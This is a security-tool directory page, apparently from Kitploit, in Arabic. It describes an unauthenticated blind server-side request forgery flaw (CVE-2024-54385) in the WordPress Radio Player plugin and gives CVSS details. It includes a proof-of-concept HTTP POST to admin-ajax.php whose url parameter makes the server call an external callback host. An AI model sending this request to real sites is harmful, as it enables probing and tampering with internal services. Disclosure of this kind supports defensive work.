Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/randomrobbiebf/cve-2024-54385
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويب
GitHubrandomrobbiebf/cve-2024-54385

CVE-2024-54385

Radio Player <= 2.0.82 - تزوير أعمى غير مصادق للطلبات من جانب الخادم

عرض المستودع
5منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-54385

Radio Player <= 2.0.82 - تزوير الطلبات من جانب الخادم دون مصادقة

الوصف

إضافة Radio Player – Live Shoutcast, Icecast and Any Audio Stream Player لوردبريس معرّضة لثغرة تزوير الطلبات من جانب الخادم (Server-Side Request Forgery) في جميع الإصدارات حتى 2.0.82 وضمنه. وهذا يتيح للمهاجمين غير المصادَق عليهم إرسال طلبات ويب إلى مواقع عشوائية تنطلق من تطبيق الويب، ويمكن استخدامها للاستعلام عن معلومات الخدمات الداخلية وتعديلها.

التفاصيل

  • النوع: plugin
  • المعرّف (Slug): radio-player
  • الإصدار المتأثر: 2.0.82
  • درجة CVSS: 7.2
  • تقييم CVSS: مرتفع
  • متجه CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
  • CVE: CVE-2024-54385
  • الحالة: نشط

POC

POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 127

action=radio_player_get_stream_data&nonce=feb9ecfbfa&utm_source=&url=http://918sodewycbbjnbts7cxy5bqyh48s0gp.bc.oast.site/live.m3u8
تنزيل الأداة